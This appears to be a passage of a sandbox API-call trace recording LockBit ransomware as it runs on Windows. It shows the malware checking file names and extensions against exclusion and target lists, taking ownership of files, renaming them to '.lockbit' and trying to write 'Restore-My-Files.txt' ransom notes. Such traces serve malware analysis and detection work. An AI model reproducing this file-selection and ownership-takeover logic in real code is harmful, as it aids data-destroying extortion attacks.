wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.262] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="InputPersonalization.exe.mui") returned 1 [0078.262] lstrcmpiW (lpString1="ntldr", lpString2="InputPersonalization.exe.mui") returned 1 [0078.262] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="InputPersonalization.exe.mui") returned 1 [0078.262] lstrcmpiW (lpString1="bootsect.bak", lpString2="InputPersonalization.exe.mui") returned -1 [0078.262] lstrcmpiW (lpString1="autorun.inf", lpString2="InputPersonalization.exe.mui") returned -1 [0078.262] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.262] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned=".mui" [0078.262] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0078.262] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0078.262] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0078.262] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0078.262] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0078.262] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0078.263] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0078.263] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0078.263] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0078.263] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0078.263] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0078.263] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0078.263] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0078.263] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0078.263] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui.lockbit") returned 94 [0078.263] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.263] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui.lockbit")) returned 0 [0078.270] GetLastError () returned 0x5 [0078.270] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.270] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.270] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.270] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.271] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.271] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.272] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0078.272] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0078.280] NtClose (Handle=0x3b0) returned 0x0 [0078.281] RtlFreeAnsiString (AnsiString="\\") [0078.281] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0078.281] malloc (_Size=0x200) returned 0x53fcc0 [0078.281] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0078.281] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.281] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.281] CloseHandle (hObject=0x3b0) returned 1 [0078.281] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0078.282] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0078.282] free (_Block=0x53fcc0) [0078.282] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.282] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui.lockbit")) returned 1 [0078.283] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0078.283] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0078.284] malloc (_Size=0x40068) returned 0x206b860 [0078.284] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=2560) returned 1 [0078.284] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0078.427] GetLastError () returned 0x3e5 [0078.427] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.427] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.430] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.439] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5800, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="IPSEventLogMsg.dll.mui", cAlternateFileName="")) returned 1 [0078.439] lstrcmpiW (lpString1=".", lpString2="IPSEventLogMsg.dll.mui") returned -1 [0078.439] lstrcmpiW (lpString1="..", lpString2="IPSEventLogMsg.dll.mui") returned -1 [0078.439] PathFindExtensionW (pszPath="IPSEventLogMsg.dll.mui") returned=".mui" [0078.439] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0078.439] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0078.439] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0078.439] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0078.439] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0078.439] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0078.439] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0078.439] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0078.439] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0078.440] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0078.440] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0078.440] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0078.440] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0078.440] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0078.440] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0078.440] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0078.440] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0078.440] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0078.441] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0078.441] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0078.441] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0078.441] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.441] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IPSEventLogMsg.dll.mui") returned 1 [0078.441] lstrcmpiW (lpString1="ntldr", lpString2="IPSEventLogMsg.dll.mui") returned 1 [0078.441] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IPSEventLogMsg.dll.mui") returned 1 [0078.441] lstrcmpiW (lpString1="bootsect.bak", lpString2="IPSEventLogMsg.dll.mui") returned -1 [0078.441] lstrcmpiW (lpString1="autorun.inf", lpString2="IPSEventLogMsg.dll.mui") returned -1 [0078.441] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.441] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned=".mui" [0078.441] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0078.441] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0078.441] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0078.441] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0078.442] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0078.442] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0078.442] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.lockbit") returned 88 [0078.442] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.442] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui.lockbit")) returned 0 [0078.443] GetLastError () returned 0x5 [0078.444] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.444] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.444] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.444] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.444] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.444] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.446] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0078.446] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0078.727] NtClose (Handle=0x3b0) returned 0x0 [0078.727] RtlFreeAnsiString (AnsiString="\\") [0078.727] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0078.727] malloc (_Size=0x200) returned 0x53fcc0 [0078.727] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0078.727] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.727] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.727] CloseHandle (hObject=0x3b0) returned 1 [0078.728] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0078.728] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0078.729] free (_Block=0x53fcc0) [0078.729] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.729] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui.lockbit")) returned 1 [0078.731] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0078.731] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0078.731] malloc (_Size=0x40068) returned 0x206b860 [0078.731] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=22528) returned 1 [0078.731] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0078.733] GetLastError () returned 0x3e5 [0078.733] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.733] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.733] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.734] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="IpsMigrationPlugin.dll.mui", cAlternateFileName="")) returned 1 [0078.734] lstrcmpiW (lpString1=".", lpString2="IpsMigrationPlugin.dll.mui") returned -1 [0078.734] lstrcmpiW (lpString1="..", lpString2="IpsMigrationPlugin.dll.mui") returned -1 [0078.734] PathFindExtensionW (pszPath="IpsMigrationPlugin.dll.mui") returned=".mui" [0078.734] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0078.734] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0078.734] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0078.734] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0078.735] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0078.735] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0078.735] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0078.735] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0078.735] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0078.735] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0078.735] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0078.735] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0078.735] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0078.736] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0078.736] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0078.736] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0078.736] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0078.736] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0078.736] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0078.736] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0078.736] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.736] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0078.736] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0078.736] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0078.736] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.736] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IpsMigrationPlugin.dll.mui") returned 1 [0078.736] lstrcmpiW (lpString1="ntldr", lpString2="IpsMigrationPlugin.dll.mui") returned 1 [0078.736] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IpsMigrationPlugin.dll.mui") returned 1 [0078.736] lstrcmpiW (lpString1="bootsect.bak", lpString2="IpsMigrationPlugin.dll.mui") returned -1 [0078.736] lstrcmpiW (lpString1="autorun.inf", lpString2="IpsMigrationPlugin.dll.mui") returned -1 [0078.736] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.736] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned=".mui" [0078.736] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0078.737] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0078.737] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 